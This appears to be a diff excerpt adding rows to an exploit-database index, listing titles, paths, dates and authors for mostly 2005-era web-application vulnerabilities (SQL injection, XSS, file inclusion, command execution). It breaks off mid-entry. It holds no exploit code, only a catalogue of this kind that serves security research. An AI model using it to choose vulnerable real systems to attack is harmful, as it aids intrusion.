+25783,exploits/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection",2005-06-01,"Dj romty",webapps,asp, +25785,exploits/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injections",2005-06-02,"Dedi Dwianto",webapps,asp, +25786,exploits/php/webapps/25786.txt,"MWChat 6.7 - 'Start_Lobby.php' Remote File Inclusion",2005-06-03,Status-x,webapps,php, +25787,exploits/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",webapps,php, +25788,exploits/php/webapps/25788.txt,"Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion",2005-06-03,"Leon Juranic",webapps,php, +25790,exploits/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection",2005-06-06,Romty,webapps,asp, +25792,exploits/php/webapps/25792.txt,"YaPiG 0.9x - Local/Remote File Inclusion",2005-06-06,anonymous,webapps,php, +25793,exploits/php/webapps/25793.txt,"YaPiG 0.9x - 'view.php' Cross-Site Scripting",2005-06-06,anonymous,webapps,php, +25794,exploits/php/webapps/25794.txt,"YaPiG 0.9x - 'upload.php' Directory Traversal",2005-06-06,anonymous,webapps,php, +25795,exploits/asp/webapps/25795.txt,"Early Impact ProductCart 2.6/2.7 - 'viewPrd.asp?idcategory' SQL Injection",2005-06-06,"Dedi Dwianto",webapps,asp, +25796,exploits/asp/webapps/25796.txt,"Early Impact ProductCart 2.6/2.7 - 'editCategories.asp?lid' SQL Injection",2005-06-06,"Dedi Dwianto",webapps,asp, +25797,exploits/asp/webapps/25797.txt,"Early Impact ProductCart 2.6/2.7 - 'modCustomCardPaymentOpt.asp?idc' SQL Injection",2005-06-06,"Dedi Dwianto",webapps,asp, +25798,exploits/asp/webapps/25798.txt,"Early Impact ProductCart 2.6/2.7 - 'OptionFieldsEdit.asp?idccr' SQL Injection",2005-06-06,"Dedi Dwianto",webapps,asp, +25799,exploits/php/webapps/25799.txt,"FlatNuke 2.5.x - 'index.php?where' Full Path Disclosure",2005-06-07,SecWatch,webapps,php, +25800,exploits/php/webapps/25800.txt,"FlatNuke 2.5.x - 'help.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-07,SecWatch,webapps,php, +25801,exploits/php/webapps/25801.php,"FlatNuke 2.5.x - 'referer.php' Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,webapps,php, +25803,exploits/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",webapps,php, +25804,exploits/asp/webapps/25804.txt,"Loki Download Manager 2.0 - 'default.asp' SQL Injection",2005-06-08,hack_912,webapps,asp, +25805,exploits/asp/webapps/25805.txt,"Loki Download Manager 2.0 - 'Catinfo.asp' SQL Injection",2005-06-08,hack_912,webapps,asp, +25806,exploits/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"James Bercegay",webapps,php, +25808,exploits/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",webapps,php, +25810,exploits/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversals",2013-05-29,"Adam Simuntis",webapps,hardware, +25811,exploits/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,webapps,hardware, +25812,exploits/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware, +25813,exploits/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware, +25815,exploits/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware, +25826,exploits/php/webapps/25826.txt,"ATutor 1.4.3 - 'browse.php?show_course' Cross-Site Scripting",2005-06-16,Lostmon,webapps,php, +25827,exploits/php/webapps/25827.txt,"ATutor 1.4.3 - 'contact.php?subject' Cross-Site Scripting",2005-06-16,Lostmon,webapps,php, +25828,exploits/php/webapps/25828.txt,"ATutor 1.4.3 - 'content.php?cid' Cross-Site Scripting",2005-06-16,Lostmon,webapps,php, +25829,exploits/php/webapps/25829.txt,"ATutor 1.4.3 - 'send_message.php?l' Cross-Site Scripting",2005-06-16,Lostmon,webapps,php, +25830,exploits/php/webapps/25830.txt,"ATutor 1.4.3 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,webapps,php, +25831,exploits/php/webapps/25831.txt,"ATutor 1.4.3 - '/inbox/index.php?view' Cross-Site Scripting",2005-06-16,Lostmon,webapps,php, +25832,exploits/php/webapps/25832.txt,"ATutor 1.4.3 - 'tile.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,webapps,php, +25833,exploits/php/webapps/25833.txt,"ATutor 1.4.3 - 'subscribe_forum.php?us' Cross-Site Scripting",2005-06-16,Lostmon,webapps,php, +25834,exploits/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,webapps,php, +25838,exploits/php/webapps/25838.pl,"Ultimate PHP Board 1.8/1.9 - Weak Password Encryption",2005-06-16,"Alberto Trivero",webapps,php, +25839,exploits/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 - 'login.asp' SQL Injection",2005-06-16,"Morning Wood",webapps,asp, +25840,exploits/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"James Bercegay",webapps,php, +25843,exploits/asp/webapps/25843.txt,"Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections",2005-06-20,"Dedi Dwianto",webapps,asp, +25844,exploits/asp/webapps/25844.txt,"Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection",2005-06-20,"Dedi Dwianto",webapps,asp, +25845,exploits/asp/webapps/25845.txt,"UApplication Ublog Reload 1.0.5 - 'Trackback.asp' Cross-Site Scripting",2005-06-20,"Dedi Dwianto",webapps,asp, +25846,exploits/php/webapps/25846.txt,"cPanel 9.1 - 'User' Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,webapps,php, +25847,exploits/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection",2003-12-07,G00db0y,webapps,asp, +25848,exploits/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,webapps,php, +25849,exploits/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution",2013-05-31,"CWH Underground",webapps,php, +26289,exploits/cgi/webapps/26289.txt,"Alkalay.Net (Multiple Scripts) - Remote Command Execution",2005-08-21,sullo@cirt.net,webapps,cgi, +26290,exploits/cgi/webapps/26290.txt,"PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site Scripting",2005-08-21,"Donnie Werner",webapps,cgi, +26291,exploits/asp/webapps/26291.txt,"Mall23 - 'AddItem.asp' SQL Injection",2005-08-21,SmOk3,webapps,asp, +25853,exploits/asp/webapps/25853.txt,"I-Gallery - Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",webapps,asp, +25854,exploits/php/webapps/25854.txt,"PAFaq - Question Cross-Site Scripting",2005-06-20,"James Bercegay",webapps,php, +25855,exploits/asp/webapps/25855.txt,"I-Gallery - Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",webapps,asp, +25856,exploits/php/webapps/25856.txt,"PAFaq - Administrator 'Username' SQL Injection",2005-06-20,"James Bercegay",webapps,php, +25857,exploits/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",webapps,php, +25858,exploits/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro - Multiple SQL Injections",2005-06-22,"Dedi Dwianto",webapps,asp, +25859,exploits/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",webapps,php, +25860,exploits/php/webapps/25860.txt,"DUware DUamazon Pro 3.0/3.1 - 'type.asp?iType' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,php, +25861,exploits/php/webapps/25861.txt,"DUware DUamazon Pro 3.0/3.1 - 'productDelete.asp?iCat' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,php, +25862,exploits/php/webapps/25862.txt,"DUware DUamazon Pro 3.0/3.1 - 'productEdit.asp?iCat' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,php, +25863,exploits/asp/webapps/25863.txt,"DUware DUamazon Pro 3.0/3.1 - 'catDelete.asp?iCat' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,asp, +25864,exploits/asp/webapps/25864.txt,"DUware DUamazon Pro 3.0/3.1 - 'review.asp?iPro' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,asp, +25865,exploits/asp/webapps/25865.txt,"DUware DUamazon Pro 3.0/3.1 - 'detail.asp?iSub' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,asp, +25866,exploits/asp/webapps/25866.txt,"DUware DUpaypal 3.0/3.1 - 'detail.asp?iPro' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,asp, +25867,exploits/asp/webapps/25867.txt,"DUware DUpaypal 3.0/3.1 - 'sub.asp?iSub' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,asp, +25868,exploits/asp/webapps/25868.txt,"DUware DUforum 3.0/3.1 - 'messages.asp?iMsg' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,asp, +25869,exploits/asp/webapps/25869.txt,"DUware DUforum 3.0/3.1 - 'post.asp?iFor' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,asp, +25870,exploits/asp/webapps/25870.txt,"DUware DUforum 3.0/3.1 - 'forums.asp?iFor' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,asp, +25871,exploits/asp/webapps/25871.txt,"DUware DUforum 3.0/3.1 - 'userEdit.asp?id' SQL Injection",2005-06-22,"Dedi Dwianto",webapps,asp, +25872,exploits/asp/webapps/25872.txt,"DUware DUclassmate 1.x - 'default.asp?iState' SQL Injection",2005-06-01,"Dedi Dwianto",webapps,asp, +25873,exploits/asp/webapps/25873.txt,"DUware DUclassmate 1.x - 'edit.asp?iPro' SQL Injection",2005-06-01,"Dedi Dwianto",webapps,asp, +25874,exploits/asp/webapps/25874.txt,"Ipswitch WhatsUp Professional 2005 SP1 - 'login.asp' SQL Injection",2005-06-22,anonymous,webapps,asp, +25875,exploits/php/webapps/25875.txt,"Whois.Cart 2.2.x - 'profile.php' Cross-Site Scripting",2005-06-23,"Elzar Stuffenbach",webapps,php, +25876,exploits/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 - 'menu_footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,webapps,php, +25877,exploits/php/webapps/25877.txt,"CarLine Forum Russian Board 4.2 - IMG Tag Cross-Site Scripting",2005-06-23,1dt.w0lf,webapps,php, +25878,exploits/php/webapps/25878.txt,"CarLine Forum Russian Board 4.2 - 'menu_header.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,webapps,php, +25879,exploits/php/webapps/25879.txt,"CarLine Forum Russian Board 4.2 - 'menu_tema.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,webapps,php, +25880,exploits/php/webapps/25880.txt,"CarLine Forum Russian Board 4.2 - 'search.php?text_poisk' Cross-Site Scripting",2005-06-23,1dt.w0lf,webapps,php, +25881,exploits/php/webapps/25881.txt,"CarLine Forum Russian Board 4.2 - 'set.php?name_ig_array[]' Cross-Site Scripting",2005-06-23,1dt.w0lf,webapps,php, +25882,exploits/php/webapps/25882.txt,"CarLine Forum Russian Board 4.2 - 'reply.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,webapps,php, +25884,exploits/php/webapps/25884.txt,"CarLine Forum Russian Board 4.2 - 'new.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,webapps,php, +25885,exploits/php/webapps/25885.txt,"CarLine Forum Russian Board 4.2 - 'edit_msg.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,webapps,php, +25886,exploits/php/webapps/25886.txt,"CarLine Forum Russian Board 4.2 - 'menu_header.php?table_sql' SQL Injection",2005-06-23,1dt.w0lf,webapps,php, +25887,exploits/php/webapps/25887.txt,"CarLine Forum Russian Board 4.2 - 'set.php?name_ig_array[1]' SQL Injection",2005-06-23,1dt.w0lf,webapps,php, +25888,exploits/php/webapps/25888.txt,"CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,webapps,php, +25889,exploits/php/webapps/25889.txt,"CarLine Forum Russian Board 4.2 - 'reply.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,webapps,php, +25890,exploits/php/webapps/25890.txt,"CarLine Forum Russian Board 4.2 - 'new.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,webapps,php, +25891,exploits/php/webapps/25891.txt,"CarLine Forum Russian Board 4.2 - 'edit_msg.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,webapps,php, +25892,exploits/php/webapps/25892.txt,"CarLine Forum Russian Board 4.2 - 'memory.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,webapps,php, +25893,exploits/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - 'line.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,webapps,php, +25894,exploits/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - 'in.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,webapps,php, +25895,exploits/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - 'enter.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,webapps,php, +25897,exploits/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection",2005-06-24,"James Bercegay",webapps,php, +25898,exploits/php/webapps/25898.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections",2005-06-24,"James Bercegay",webapps,php, +25899,exploits/php/webapps/25899.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection",2005-06-24,"James Bercegay",webapps,php, +25900,exploits/php/webapps/25900.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection",2005-06-24,"James Bercegay",webapps,php, +25901,exploits/php/webapps/25901.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection",2005-06-24,"James Bercegay",webapps,php, +25902,exploits/php/webapps/25902.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection",2005-06-24,"James Bercegay",webapps,php, +25903,exploits/php/webapps/25903.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection",2005-06-24,"James Bercegay",webapps,php, +25904,exploits/php/webapps/25904.c,"K-COLLECT CSV_DB.CGI 1.0/i_DB.CGI 1.0 - Remote Command Execution",2005-06-24,blahplok,webapps,php, +25905,exploits/asp/webapps/25905.txt,"ASPNuke 0.80 - 'forgot_password.asp?email' Cross-Site Scripting",2005-06-27,"Alberto Trivero",webapps,asp, +25906,exploits/asp/webapps/25906.txt,"ASPNuke 0.80 - 'register.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-06-27,"Alberto Trivero",webapps,asp, +25907,exploits/asp/webapps/25907.txt,"ASPNuke 0.80 - 'Language_Select.asp' HTTP Response Splitting",2005-06-27,"Alberto Trivero",webapps,asp, +25908,exploits/asp/webapps/25908.txt,"ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload",2005-06-27,Psycho,webapps,asp, +25909,exploits/php/webapps/25909.txt,"Mensajeitor 1.8.9 - 'IP' HTML Injection",2005-06-27,Megabyte,webapps,php, +25910,exploits/asp/webapps/25910.txt,"Community Server Forums - 'SearchResults.aspx' Cross-Site Scripting",2005-06-28,abducter_minds@yahoo.com,webapps,asp, +25913,exploits/asp/webapps/25913.txt,"Hosting Controller 6.1 - 'error.asp' Cross-Site Scripting",2005-06-28,"Ashiyane Digital Security Team",webapps,asp, +25914,exploits/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' SQL Injection",2005-06-28,basher13,webapps,asp, +25915,exploits/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection",2013-06-03,drone,webapps,php, +25927,exploits/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x - 'Graph_Image.php' Remote Command Execution Variant",2005-07-01,"Alberto Trivero",webapps,php, +25918,exploits/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution",2005-06-29,blahplok,webapps,cgi, +25919,exploits/php/webapps/25919.txt,"Phorum 5.0.11 - 'Read.php' SQL Injection",2004-10-24,"Positive Technologies",webapps,php, +25920,exploits/cgi/webapps/25920.pl,"Community Link Pro - 'login.cgi?File' Remote Command Execution",2005-06-29,spher3,webapps,cgi, +25922,exploits/asp/webapps/25922.txt,"CyberStrong EShop 4.2 - '20review.asp' SQL Injection",2005-06-30,aresu@bosen.net,webapps,asp, +25923,exploits/asp/webapps/25923.txt,"CyberStrong eShop 4.2 - '10expand.asp' SQL Injection",2005-06-30,aresu@bosen.net,webapps,asp, +25926,exploits/php/webapps/25926.txt,"osTicket 1.2/1.3 - 'view.php?inc' Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",webapps,php, +25924,exploits/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal",2005-06-30,ActualMInd,webapps,asp, +25925,exploits/asp/webapps/25925.txt,"CyberStrong EShop 4.2 - '10browse.asp' SQL Injection",2005-06-30,aresu@bosen.net,webapps,asp, +25928,exploits/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'calendar.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php, +25929,exploits/php/webapps/25929.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'popup.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php, +25930,exploits/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'header.inc.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php, +25931,exploits/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'datePicker.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php, +25932,exploits/php/webapps/25932.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'setupSQL.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php, +25934,exploits/php/webapps/25934.txt,"Plague News System 0.7 - 'CID' SQL Injection",2005-07-04,Easyex,webapps,php, +25935,exploits/php/webapps/25935.txt,"Plague News System 0.7 - 'CID' Cross-Site Scripting",2005-07-04,Easyex,webapps,php, +25937,exploits/php/webapps/25937.txt,"Plague News System 0.7 - 'delete.php' Access Restriction Bypass",2005-07-04,Easyex,webapps,php, +25938,exploits/php/webapps/25938.txt,"phpPgAdmin 3.x - Login Form Directory Traversal",2005-07-05,rznvynqqe@hushmail.com,webapps,php, +25939,exploits/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - 'Read.cgi' Remote Command Execution",2005-07-05,AcidCrash,webapps,cgi, +25940,exploits/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - 'index.php' Cross-Site Scripting",2005-07-05,mozako,webapps,php, +25941,exploits/php/webapps/25941.txt,"MyGuestbook 0.6.1 - 'Form.Inc.php3' Remote File Inclusion",2005-07-05,"SoulBlack Group",webapps,php, +25942,exploits/php/webapps/25942.txt,"Jaws 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",webapps,php, +25945,exploits/php/webapps/25945.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",webapps,php, +25946,exploits/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,webapps,jsp, +25950,exploits/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling",2005-07-06,c0ntex,webapps,cgi, +25951,exploits/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injections",2005-07-07,"Diabolic Crab",webapps,php, +25952,exploits/cgi/webapps/25952.txt,"Pngren 2.0.1 - 'Kaiseki.cgi' Remote Command Execution",2005-07-07,blahplok,webapps,cgi, +25953,exploits/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injections",2005-07-07,"Diabolic Crab",webapps,asp, +25954,exploits/php/webapps/25954.txt,"phpAuction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,webapps,php, +25955,exploits/php/webapps/25955.txt,"PhotoGal 1.0/1.5 - News_File Remote File Inclusion",2005-07-07,"skdaemon porra",webapps,php, +25956,exploits/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",webapps,asp, +25957,exploits/php/webapps/25957.txt,"PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",webapps,php, +25958,exploits/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - 'SQL.CLS.php' SQL Injection",2005-07-10,Defa,webapps,php, +25959,exploits/php/webapps/25959.txt,"Spid 1.3 - 'lang_path' File Inclusion",2005-07-11,"skdaemon porra",webapps,php, +25960,exploits/php/webapps/25960.txt,"PPA 0.5.6 - 'ppa_root_path' File Inclusion",2005-07-10,"skdaemon porra",webapps,php, +25963,exploits/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",webapps,asp, +25964,exploits/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - 'Inc.login.php' Privilege Escalation",2005-07-11,"Stefan Lochbihler",webapps,php, +25965,exploits/asp/webapps/25965.txt,"DVBBS 7.1 - 'ShowErr.asp' Cross-Site Scripting",2005-07-12,rUnViRuS,webapps,asp, +25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware, +25969,exploits/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",webapps,hardware, +25971,exploits/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",webapps,php, +25973,exploits/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php?folder' Directory Traversal",2013-06-05,expl0i13r,webapps,php, +25976,exploits/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,hardware, +25977,exploits/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,jsp, +25978,exploits/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",webapps,hardware,80 +25981,exploits/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",webapps,asp, +25982,exploits/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - 'Forum.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm, +25983,exploits/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - 'User.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm, +25984,exploits/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 - 'Thread.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm, +25985,exploits/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 - 'Search.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm, +25990,exploits/php/webapps/25990.txt,"Clever Copy 2.0 - 'calendar.php' Cross-Site Scripting",2005-07-15,Lostmon,webapps,php, +25994,exploits/php/webapps/25994.txt,"osCommerce 2.2 - 'update.php' Information Disclosure",2005-07-18,"Andrew Hunter",webapps,php, +25995,exploits/php/webapps/25995.txt,"e107 Website System 0.6 - Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",webapps,php, +25996,exploits/php/webapps/25996.txt,"Ruubikcms 1.1.1 - Persistent Cross-Site Scripting",2013-06-07,expl0i13r,webapps,php, +25997,exploits/php/webapps/25997.txt,"tForum b0.9 - 'member.php' Cross-Site Scripting",2005-07-18,wannacut,webapps,php, +25998,exploits/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,webapps,hardware, +26001,exploits/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",webapps,java, +26007,exploits/php/webapps/26007.txt,"PHP Ticket System Beta 1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",webapps,php, +26293,exploits/php/webapps/26293.txt,"jPORTAL 2.2.1/2.3.1 - 'download.php' SQL Injection",2005-08-21,krasza,webapps,php, +26294,exploits/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 - 'Password.php' SQL Injection",2005-08-23,retrogod@aliceposta.it,webapps,php, +26295,exploits/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,webapps,php, +26296,exploits/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,webapps,php, +26009,exploits/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",webapps,php, +26012,exploits/windows/webapps/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,webapps,windows,80 +26014,exploits/php/webapps/26014.txt,"FForm Sender 1.0 - 'Processform.php3?Name' Cross-Site Scripting",2005-07-19,rgod,webapps,php, +26015,exploits/php/webapps/26015.txt,"Form Sender 1.0 - 'Processform.php3?Failed' Cross-Site Scripting",2005-07-19,rgod,webapps,php, +26016,exploits/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,webapps,php, +26017,exploits/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",webapps,cgi, +26018,exploits/php/webapps/26018.txt,"Pyrox Search 1.0.5 - 'Newsearch.php' Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,webapps,php, +26019,exploits/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",webapps,php, +26020,exploits/php/webapps/26020.txt,"Asn Guestbook 1.5 - 'header.php?version' Cross-Site Scripting",2005-07-22,rgod,webapps,php, +26021,exploits/php/webapps/26021.txt,"Asn Guestbook 1.5 - 'footer.php?version' Cross-Site Scripting",2005-07-22,rgod,webapps,php, +26023,exploits/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion",2005-07-25,lwdz,webapps,php, +26025,exploits/php/webapps/26025.txt,"Netquery 3.1 - 'submit.php?portnum' Cross-Site Scripting",2005-07-25,rgod,webapps,php, +26026,exploits/php/webapps/26026.txt,"Netquery 3.1 - 'nqgeoip2.php' Multiple Cross-Site Scripting Vulnerabilities",2005-07-25,rgod,webapps,php, +26027,exploits/php/webapps/26027.txt,"Netquery 3.1 - 'nqgeoip.php?step' Cross-Site Scripting",2005-07-25,rgod,webapps,php, +26028,exploits/php/webapps/26028.txt,"Netquery 3.1 - 'nqports.php?step' Cross-Site Scripting",2005-07-25,rgod,webapps,php, +26029,exploits/php/webapps/26029.txt,"Netquery 3.1 - 'nqports2.php' Multiple Cross-Site Scripting Vulnerabilities",2005-07-25,rgod,webapps,php, +26030,exploits/php/webapps/26030.txt,"Netquery 3.1 - 'portlist.php?portnum' Cross-Site Scripting",2005-07-25,rgod,webapps,php, +26031,exploits/php/webapps/26031.txt,"VBZoom Forum 1.11 - 'show.php' SQL Injection",2005-07-26,abducter_minds@yahoo.com,webapps,php, +26033,exploits/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - 'viewcart.asp' Cross-Site Scripting",2005-07-26,Zinho,webapps,asp, +26034,exploits/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - 'Guestbook.php' Cross-Site Scripting",2005-07-26,rgod,webapps,php, +26036,exploits/php/webapps/26036.txt,"PNG Counter 1.0 - 'Demo.php' Cross-Site Scripting",2005-07-26,ArCaX-ATH,webapps,php, +26037,exploits/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,webapps,php, +26038,exploits/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site 